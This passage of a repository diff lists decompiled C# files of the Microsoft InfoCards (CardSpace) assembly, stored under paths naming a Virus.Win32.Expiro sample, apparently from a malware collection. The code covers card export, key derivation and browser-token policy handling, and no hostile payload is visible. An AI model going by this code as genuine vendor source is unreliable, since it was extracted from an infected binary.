protected override void OnMarshalAsyncOutArgs(BinaryWriter writer)
{
GetFileNameResult result = (GetFileNameResult) this.Result;
InfoCardTrace.Assert(null != result, "The get file result cannot be null.");
Utility.SerializeString(writer, result.FileName);
Utility.SerializeBytes(writer, result.FileContent);
writer.Flush();
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/EndSelectCardRequest.cs
+29
View File
@@ -0,0 +1,29 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.EndSelectCardRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.IO;
namespace Microsoft.InfoCards
{
internal class EndSelectCardRequest : UIAgentAsyncEndRequest
{
public EndSelectCardRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
protected override void OnMarshalAsyncOutArgs(BinaryWriter writer)
{
int result = (int) this.Result;
writer.Write(result);
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/ExceptionList.cs
+22
View File
@@ -0,0 +1,22 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.ExceptionList
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Collections.Generic;
namespace Microsoft.InfoCards
{
internal sealed class ExceptionList
{
public static ExceptionList AllNonFatal = new ExceptionList();
public static ExceptionList Empty = new ExceptionList();
private Dictionary<Type, Type> m_list;
private ExceptionList() => this.m_list = new Dictionary<Type, Type>(0);
public bool Contains(Type exceptionType) => this.m_list.ContainsKey(exceptionType);
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/ExceptionTranslationTable.cs
+41
View File
@@ -0,0 +1,41 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.ExceptionTranslationTable
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Collections.Generic;
using System.Security;
namespace Microsoft.InfoCards
{
internal sealed class ExceptionTranslationTable
{
private Dictionary<Type, int> m_table;
private static ExceptionTranslationTable s_thisTable;
public static ExceptionTranslationTable Instance
{
get
{
if (ExceptionTranslationTable.s_thisTable == null)
ExceptionTranslationTable.s_thisTable = new ExceptionTranslationTable();
return ExceptionTranslationTable.s_thisTable;
}
}
private ExceptionTranslationTable()
{
this.m_table = new Dictionary<Type, int>();
this.m_table.Add(typeof (ApplicationException), -2146232832);
this.m_table.Add(typeof (InvalidOperationException), -1073413888);
this.m_table.Add(typeof (NotImplementedException), -2147467263);
this.m_table.Add(typeof (SecurityException), -2147024891);
}
public int this[Type key] => this.m_table[key];
public bool ContainsKey(Type key) => this.m_table.ContainsKey(key);
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/ExportException.cs
+36
View File
@@ -0,0 +1,36 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.ExportException
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Runtime.Serialization;
namespace Microsoft.InfoCards
{
internal class ExportException : InfoCardBaseException
{
private const int HRESULT = -1073413886;
public ExportException()
: base(-1073413886)
{
}
public ExportException(string message)
: base(-1073413886, message)
{
}
public ExportException(string message, Exception inner)
: base(-1073413886, message, inner)
{
}
protected ExportException(SerializationInfo si, StreamingContext sc)
: base(-1073413886, si, sc)
{
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/ExportFileRequest.cs
+114
View File
@@ -0,0 +1,114 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.ExportFileRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Collections.Generic;
using System.IO;
using System.Text;
using System.Xml;
using System.Xml.Schema;
namespace Microsoft.InfoCards
{
internal class ExportFileRequest : UIAgentRequest
{
private string m_filename;
private string m_passphrase;
private string[] m_cardIds;
public ExportFileRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
protected override void OnMarshalInArgs()
{
BinaryReader reader = (BinaryReader) new InfoCardBinaryReader(this.InArgs, Encoding.Unicode);
this.m_filename = Utility.DeserializeString(reader);
this.m_passphrase = Utility.DeserializeString(reader);
uint length = reader.ReadUInt32();
this.m_cardIds = new string[(IntPtr) length];
for (uint index = 0; index < length; ++index)
this.m_cardIds[(IntPtr) index] = Utility.DeserializeString(reader);
}
protected override void OnProcess()
{
InfoCardTrace.Assert(!string.IsNullOrEmpty(this.m_filename), "No file name was specified");
InfoCardTrace.Assert(!string.IsNullOrEmpty(this.m_passphrase), " No passphrase specified for the file");
StoreConnection connection = StoreConnection.GetConnection();
try
{
RoamingStoreFile roamingStoreFile = new RoamingStoreFile();
try
{
for (int index = 0; index < this.m_cardIds.Length; ++index)
{
InfoCard infoCard = new InfoCard(new Uri(this.m_cardIds[index]));
infoCard.Get(connection);
infoCard.GetMasterKey(connection);
roamingStoreFile.Cards.Add(infoCard);
}
using (FileStream output = new FileStream(this.m_filename, FileMode.Create))
{
using (XmlWriter writer = XmlWriter.Create((Stream) output, new XmlWriterSettings()
{
CloseOutput = false
}))
{
roamingStoreFile.WriteTo(this.m_passphrase, writer);
writer.Flush();
}
output.Flush();
}
}
finally
{
foreach (InfoCard card in (IEnumerable<InfoCard>) roamingStoreFile.Cards)
card.ClearSensitiveData();
}
AuditLog.AuditStoreExport();
}
catch (XmlSchemaValidationException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new ExportException(SR.GetString("SchemaValidationFailed"), (Exception) ex));
}
catch (XmlException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new ExportException(SR.GetString("InvalidImportFile"), (Exception) ex));
}
catch (UnauthorizedAccessException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new ExportException(SR.GetString("ImportInaccesibleFile"), (Exception) ex));
}
catch (IOException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new ExportException(SR.GetString("InvalidImportFile"), (Exception) ex));
}
catch (ArgumentException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new ExportException(SR.GetString("ImportInaccesibleFile"), (Exception) ex));
}
catch (SerializationIncompleteException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new ExportException(SR.GetString("FailedToSerializeObject", (object) ex.ObjectType), (Exception) ex));
}
finally
{
connection.Close();
}
}
protected override void OnMarshalOutArgs()
{
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/FailedToStartupUIException.cs
+31
View File
@@ -0,0 +1,31 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.FailedToStartupUIException
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Runtime.Serialization;
namespace Microsoft.InfoCards
{
internal class FailedToStartupUIException : InfoCardBaseException
{
private const int HRESULT = -1073413867;
public FailedToStartupUIException()
: base(-1073413867)
{
}
public FailedToStartupUIException(string message, Exception inner)
: base(-1073413867, message, inner)
{
}
protected FailedToStartupUIException(SerializationInfo si, StreamingContext sc)
: base(-1073413867, si, sc)
{
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/FileAccessException.cs
+36
View File
@@ -0,0 +1,36 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.FileAccessException
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Runtime.Serialization;
namespace Microsoft.InfoCards
{
internal class FileAccessException : InfoCardBaseException
{
private const int HRESULT = -1073413864;
public FileAccessException()
: base(-1073413864)
{
}
public FileAccessException(string message)
: base(-1073413864, message)
{
}
public FileAccessException(string message, Exception inner)
: base(-1073413864, message, inner)
{
}
protected FileAccessException(SerializationInfo si, StreamingContext sc)
: base(-1073413864, si, sc)
{
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/FileDataSource.cs
+1083
View File
File diff suppressed because it is too large Load Diff
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/FreeIndexList.cs
+43
View File
@@ -0,0 +1,43 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.FreeIndexList
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Collections.Generic;
namespace Microsoft.InfoCards
{
internal class FreeIndexList
{
private Dictionary<int, int> m_list;
public FreeIndexList(int size) => this.m_list = size > 0 ? new Dictionary<int, int>(size) : throw InfoCardTrace.ThrowHelperError((Exception) new ArgumentOutOfRangeException(nameof (size), (object) size, SR.GetString("StoreFreeListSizeOutOfRange")));
public bool Contains(int value) => value > 0 ? this.m_list.ContainsKey(value) : throw InfoCardTrace.ThrowHelperError((Exception) new ArgumentOutOfRangeException(nameof (value), (object) value, SR.GetString("StoreFreeListValueOutOfRange")));
public void Put(int value)
{
if (value <= 0)
throw InfoCardTrace.ThrowHelperError((Exception) new ArgumentOutOfRangeException(nameof (value), (object) value, SR.GetString("StoreFreeListValueOutOfRange")));
this.m_list.Add(value, value);
}
public int GetNext()
{
int key = -1;
if (this.m_list.Count > 0)
{
using (IEnumerator<int> enumerator = (IEnumerator<int>) this.m_list.Keys.GetEnumerator())
{
enumerator.MoveNext();
key = enumerator.Current;
}
this.m_list.Remove(key);
}
return key;
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GenerateDerivedKeyRequest.cs
+58
View File
@@ -0,0 +1,58 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GenerateDerivedKeyRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Principal;
using System.Text;
namespace Microsoft.InfoCards
{
internal class GenerateDerivedKeyRequest : ClientRequest
{
private int m_sessionId;
private byte[] m_label;
private byte[] m_nonce;
private int m_derivedKeyLength;
private int m_offset;
private string m_derivationAlgUri;
private byte[] m_key;
public GenerateDerivedKeyRequest(
Process callingProcess,
WindowsIdentity callingIdentity,
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs)
: base(callingProcess, callingIdentity, rpcHandle, inArgs, outArgs)
{
this.m_key = (byte[]) null;
}
protected override void OnMarshalInArgs()
{
BinaryReader reader = (BinaryReader) new InfoCardBinaryReader(this.InArgs, Encoding.Unicode);
this.m_sessionId = reader.ReadInt32();
int count1 = reader.ReadInt32();
this.m_label = reader.ReadBytes(count1);
int count2 = reader.ReadInt32();
this.m_nonce = reader.ReadBytes(count2);
this.m_derivedKeyLength = reader.ReadInt32();
this.m_offset = reader.ReadInt32();
this.m_derivationAlgUri = Utility.DeserializeString(reader);
}
protected override void OnProcess() => this.m_key = ((SymmetricCryptoSession) CryptoSession.Find(this.m_sessionId, this.CallerPid, this.RequestorIdentity.User)).GenerateDerivedKey(this.m_derivationAlgUri, this.m_label, this.m_nonce, this.m_derivedKeyLength, this.m_offset);
protected override void OnMarshalOutArgs()
{
BinaryWriter binaryWriter = new BinaryWriter(this.OutArgs, Encoding.Unicode);
binaryWriter.Write(this.m_key.Length);
binaryWriter.Write(this.m_key);
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GetBrowserTokenEndpoint.cs
+90
View File
@@ -0,0 +1,90 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GetBrowserTokenEndpoint
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.IO;
using System.Security.Cryptography.X509Certificates;
using System.ServiceModel;
using System.ServiceModel.Channels;
using System.Text;
using System.Xml;
namespace Microsoft.InfoCards
{
internal class GetBrowserTokenEndpoint
{
private Uri m_address;
private Uri m_policyAddress;
private X509Certificate2Collection m_supportingCertsCollection = new X509Certificate2Collection();
private X509Certificate2 m_leafCert;
public Uri Address => this.m_address;
public Uri PolicyUrl => this.m_policyAddress;
public X509Certificate2Collection SupportingCertificates => this.m_supportingCertsCollection;
public X509Certificate2 LeafCertificate => this.m_leafCert;
public EndpointAddress CreateEndpointAddress()
{
if (!((Uri) null != this.m_address))
return (EndpointAddress) null;
return this.LeafCertificate != null ? new EndpointAddress(this.m_address, EndpointIdentity.CreateX509CertificateIdentity(this.LeafCertificate, this.SupportingCertificates), new AddressHeader[0]) : new EndpointAddress(this.m_address, new AddressHeader[0]);
}
public XmlElement CreateEndpointAddressXml()
{
if ((Uri) null != this.m_address)
{
EndpointAddress endpointAddress = this.LeafCertificate == null ? new EndpointAddress(this.m_address, new AddressHeader[0]) : new EndpointAddress(this.m_address, EndpointIdentity.CreateX509CertificateIdentity(this.LeafCertificate, this.SupportingCertificates), new AddressHeader[0]);
if ((EndpointAddress) null != endpointAddress)
{
using (MemoryStream memoryStream = new MemoryStream())
{
using (XmlWriter writer = (XmlWriter) new XmlTextWriter((Stream) memoryStream, Encoding.UTF8))
{
endpointAddress.WriteTo(AddressingVersion.WSAddressing10, writer);
writer.Flush();
memoryStream.Flush();
memoryStream.Seek(0L, SeekOrigin.Begin);
using (XmlReader readerWithQuotas = (XmlReader) Utility.CreateReaderWithQuotas((Stream) memoryStream))
return (XmlElement) new XmlDocument().ReadNode(readerWithQuotas);
}
}
}
}
return (XmlElement) null;
}
public void Load(BinaryReader reader, int paramVersion)
{
string uriString1 = Utility.DeserializeString(reader);
if (!string.IsNullOrEmpty(uriString1))
this.m_address = new Uri(uriString1);
string uriString2 = Utility.DeserializeString(reader);
if (!string.IsNullOrEmpty(uriString2))
this.m_policyAddress = new Uri(uriString2);
int num = 0;
if (2 == paramVersion)
num = reader.ReadInt32();
else if (1 == paramVersion)
num = 1;
for (int index = 0; index < num; ++index)
{
byte[] numArray = reader.ReadBytes(reader.ReadInt32());
if (!Utility.ArrayIsNullOrEmpty((Array) numArray))
{
X509Certificate2 certificate = new X509Certificate2(numArray);
if (index == 0)
this.m_leafCert = certificate;
else
this.m_supportingCertsCollection.Add(certificate);
}
}
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GetBrowserTokenParameters.cs
+110
View File
@@ -0,0 +1,110 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GetBrowserTokenParameters
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.IdentityModel.Selectors;
using System.IdentityModel.Tokens;
using System.IO;
using System.ServiceModel.Security;
using System.ServiceModel.Security.Tokens;
using System.Xml;
namespace Microsoft.InfoCards
{
internal class GetBrowserTokenParameters
{
private GetBrowserTokenEndpoint m_recipient;
private GetBrowserTokenEndpoint m_issuer;
private Uri m_tokenType;
private List<string> m_requiredClaims;
private List<string> m_optionalClaims;
private int m_flags;
private uint m_privacyVersion;
private Uri m_privacyUrl;
public GetBrowserTokenParameters()
{
this.m_recipient = new GetBrowserTokenEndpoint();
this.m_issuer = new GetBrowserTokenEndpoint();
this.m_requiredClaims = new List<string>();
this.m_optionalClaims = new List<string>();
}
public GetBrowserTokenEndpoint Recipient => this.m_recipient;
public GetBrowserTokenEndpoint Issuer => this.m_issuer;
public IList<string> RequiredClaims => (IList<string>) this.m_requiredClaims.AsReadOnly();
public IList<string> OptionalClaims => (IList<string>) this.m_optionalClaims.AsReadOnly();
public Uri PrivacyUrl => this.m_privacyUrl;
public uint PrivacyVersion => this.m_privacyVersion;
public void Load(BinaryReader reader, int paramVersion)
{
this.m_flags = paramVersion;
this.m_recipient.Load(reader, paramVersion);
this.m_issuer.Load(reader, paramVersion);
string uriString1 = Utility.DeserializeString(reader);
if (!string.IsNullOrEmpty(uriString1))
this.m_tokenType = new Uri(uriString1);
int num1 = reader.ReadInt32();
for (int index = 0; index < num1; ++index)
this.m_requiredClaims.Add(Utility.DeserializeString(reader));
int num2 = reader.ReadInt32();
for (int index = 0; index < num2; ++index)
this.m_optionalClaims.Add(Utility.DeserializeString(reader));
this.m_privacyVersion = reader.ReadUInt32();
string uriString2 = Utility.DeserializeString(reader);
if (!string.IsNullOrEmpty(uriString2))
this.m_privacyUrl = new Uri(uriString2);
else
this.m_privacyUrl = (Uri) null;
}
public CardSpacePolicyElement CreatePolicyElement(
ProtocolProfile protocolProfile)
{
XmlDocument document = new XmlDocument();
XmlElement element = document.CreateElement(protocolProfile.WSTrust.DefaultPrefix, protocolProfile.WSTrust.ClaimsElement, protocolProfile.WSTrust.Namespace);
foreach (string requiredClaim in (IEnumerable<string>) this.RequiredClaims)
element.AppendChild((XmlNode) GetBrowserTokenParameters.CreateClaimElement(document, requiredClaim, false));
foreach (string optionalClaim in (IEnumerable<string>) this.OptionalClaims)
element.AppendChild((XmlNode) GetBrowserTokenParameters.CreateClaimElement(document, optionalClaim, true));
IssuedSecurityTokenParameters securityTokenParameters = new IssuedSecurityTokenParameters();
if ((Uri) null != this.m_tokenType)
securityTokenParameters.TokenType = this.m_tokenType.ToString();
securityTokenParameters.AdditionalRequestParameters.Add(element);
Collection<XmlElement> requestParameters = securityTokenParameters.CreateRequestParameters(protocolProfile.MsgSecurityVersion, (SecurityTokenSerializer) new WSSecurityTokenSerializer(protocolProfile.MsgSecurityVersion.SecurityVersion, true, (SamlSerializer) null, (SecurityStateEncoder) null, (IEnumerable<Type>) null));
foreach (XmlElement xmlElement in requestParameters)
{
if (StringComparer.Ordinal.Equals(xmlElement.LocalName, protocolProfile.WSTrust.KeyType) && StringComparer.Ordinal.Equals(xmlElement.NamespaceURI, protocolProfile.WSTrust.Namespace))
{
xmlElement.RemoveAll();
xmlElement.AppendChild((XmlNode) xmlElement.OwnerDocument.CreateTextNode(protocolProfile.WSTrust.KeyTypeBearer.OriginalString));
break;
}
}
return new CardSpacePolicyElement(this.m_recipient != null ? this.m_recipient.CreateEndpointAddressXml() : (XmlElement) null, this.m_issuer != null ? this.m_issuer.CreateEndpointAddressXml() : (XmlElement) null, requestParameters, this.m_privacyUrl, Convert.ToInt32(this.m_privacyVersion), false);
}
private static XmlElement CreateClaimElement(
XmlDocument document,
string claimUri,
bool optional)
{
XmlElement element = document.CreateElement("wsid", "ClaimType", "http://schemas.xmlsoap.org/ws/2005/05/identity");
element.SetAttribute("Uri", claimUri);
if (optional)
element.SetAttribute("Optional", "true");
return element;
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GetBrowserTokenRequest.cs
+609
View File
@@ -0,0 +1,609 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GetBrowserTokenRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Diagnostics;
using System.Globalization;
using System.IdentityModel.Policy;
using System.IdentityModel.Selectors;
using System.IdentityModel.Tokens;
using System.IO;
using System.Net;
using System.Net.Security;
using System.Security.Cryptography.X509Certificates;
using System.Security.Principal;
using System.ServiceModel;
using System.ServiceModel.Channels;
using System.ServiceModel.Description;
using System.ServiceModel.Dispatcher;
using System.ServiceModel.Security;
using System.ServiceModel.Security.Tokens;
using System.Text;
using System.Xml;
namespace Microsoft.InfoCards
{
internal class GetBrowserTokenRequest : GetTokenRequest
{
public const int POLICY_V1 = 1;
public const int POLICY_V2 = 2;
private GetBrowserTokenParameters m_params;
private ServiceEndpoint m_svcEpr;
private byte[] m_rawToken;
private SelfIssuedAuthProofToken m_proofToken;
private ProtocolProfile m_protocolProfile;
public GetBrowserTokenRequest(
Process callingProcess,
WindowsIdentity callingIdentity,
InfoCardUIAgent uiAgent,
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs)
: base(callingProcess, callingIdentity, uiAgent, rpcHandle, inArgs, outArgs)
{
this.m_protocolProfile = new ProtocolProfile();
}
private static bool IsReferralToManagedIssuer(Binding issuerBinding)
{
bool managedIssuer = false;
if (issuerBinding != null && issuerBinding.CreateBindingElements().Find<UseManagedPresentationBindingElement>() != null)
managedIssuer = true;
return managedIssuer;
}
protected override void OnMarshalInArgs()
{
BinaryReader reader = (BinaryReader) new InfoCardBinaryReader(this.InArgs, Encoding.Unicode);
try
{
this.m_params = new GetBrowserTokenParameters();
int paramVersion = reader.ReadInt32();
if (1 != paramVersion && 2 != paramVersion)
throw InfoCardTrace.ThrowHelperError((Exception) new InfoCardArgumentException(SR.GetString("InvalidFlagsSpecified")));
this.m_params.Load(reader, paramVersion);
if ((Uri) null == this.m_params.Issuer.PolicyUrl)
{
this.CreateInfoCardPolicyFromBrowserParams();
}
else
{
if (Utility.CompareUri(XmlNames.WSIdentity.SelfIssuerUriValue, this.m_params.Issuer.Address) || Utility.CompareUri(XmlNames.WSIdentity.AnonymousIssuerUriValue, this.m_params.Issuer.Address))
throw InfoCardTrace.ThrowHelperError((Exception) new InfoCardArgumentException(SR.GetString("SelfOrAnonIssuerNotAllowedWhenMexSpecified", (object) this.m_params.Issuer.Address)));
if ((Uri) null == this.m_params.Issuer.Address)
throw InfoCardTrace.ThrowHelperError((Exception) new InfoCardArgumentException(SR.GetString("NoIssuerSpecifiedWhenMexIsSpecified")));
ServiceEndpointCollection endpointCollection;
try
{
endpointCollection = this.GetServiceEndpointCollection(this.m_params.Issuer.Address, this.m_params.Issuer.PolicyUrl);
}
catch (Exception ex)
{
if (InfoCardTrace.IsFatal(ex))
throw;
else
endpointCollection = (ServiceEndpointCollection) null;
}
if (endpointCollection != null && endpointCollection.Find(this.m_params.Issuer.Address) != null)
{
ServiceEndpoint serviceEndpoint = endpointCollection.Find(this.m_params.Issuer.Address);
if (!GetBrowserTokenRequest.IsReferralToManagedIssuer(serviceEndpoint.Binding) && this.DoesEndpointSatisfySecurityRequirements(serviceEndpoint) && this.DoesEndpointSatisfyIssuedTokenRequirements(serviceEndpoint))
{
if (Uri.UriSchemeHttps != this.m_params.Recipient.Address.Scheme)
throw InfoCardTrace.ThrowHelperError((Exception) new InfoCardArgumentException(SR.GetString("RPStsWithNoSSLFailure")));
this.m_svcEpr = serviceEndpoint;
SecurityBindingElement securityBindingElement = serviceEndpoint.Binding.CreateBindingElements().Find<SecurityBindingElement>();
InfoCardTrace.Assert(null != securityBindingElement, "No SecurityBindingElement was found in the BindingElementCollection");
if (TrustVersion.WSTrust13 == securityBindingElement.MessageSecurityVersion.TrustVersion)
this.m_protocolProfile.WSTrust = (XmlNames.IWSTrust) XmlNames.WSTrustOasis2007.Instance;
}
}
this.CreateInfoCardPolicyFromBrowserParams();
}
}
catch (InfoCardBaseException ex)
{
throw;
}
catch (Exception ex)
{
if (!InfoCardTrace.IsFatal(ex))
throw InfoCardTrace.ThrowHelperError((Exception) new InfoCardArgumentException(SR.GetString("ServiceInvalidArguments"), ex));
throw;
}
}
private void CreateInfoCardPolicyFromBrowserParams()
{
CardSpacePolicyElement policyElement = this.m_params.CreatePolicyElement(this.m_protocolProfile);
InfoCardPolicy browserTokenRequest = PolicyFactory.CreatePolicyForGetBrowserTokenRequest(policyElement, policyElement.PolicyNoticeLink, (uint) policyElement.PolicyNoticeVersion, RecipientIdentity.CreateIdentity(this.m_params.Recipient.CreateEndpointAddress(), true), PolicyUsageContext.Browser);
browserTokenRequest.Validate();
this.Policy = browserTokenRequest;
}
private bool DoesEndpointSatisfyIssuedTokenRequirements(ServiceEndpoint serviceEndpoint)
{
if (serviceEndpoint != null)
{
bool disallowedStpDetected = false;
if (GetBrowserTokenRequest.TryGetNextStsIssuedTokenParameters(serviceEndpoint.Binding.CreateBindingElements(), ref disallowedStpDetected) != null)
return true;
}
return false;
}
private bool DoesEndpointSatisfySecurityRequirements(ServiceEndpoint serviceEndpoint)
{
if (serviceEndpoint != null)
{
ISecurityCapabilities property = serviceEndpoint.Binding.GetProperty<ISecurityCapabilities>(new BindingParameterCollection());
if (property != null && property.SupportedRequestProtectionLevel == ProtectionLevel.EncryptAndSign && property.SupportedResponseProtectionLevel == ProtectionLevel.EncryptAndSign && property.SupportsClientAuthentication && property.SupportsServerAuthentication)
return true;
}
return false;
}
protected override void OnMarshalOutArgs()
{
BinaryWriter binaryWriter = new BinaryWriter(this.OutArgs, Encoding.Unicode);
try
{
try
{
binaryWriter.Write(this.m_rawToken.Length);
binaryWriter.Write(this.m_rawToken, 0, this.m_rawToken.Length);
}
finally
{
Array.Clear((Array) this.m_rawToken, 0, this.m_rawToken.Length);
}
}
catch (Exception ex)
{
if (!InfoCardTrace.IsFatal(ex))
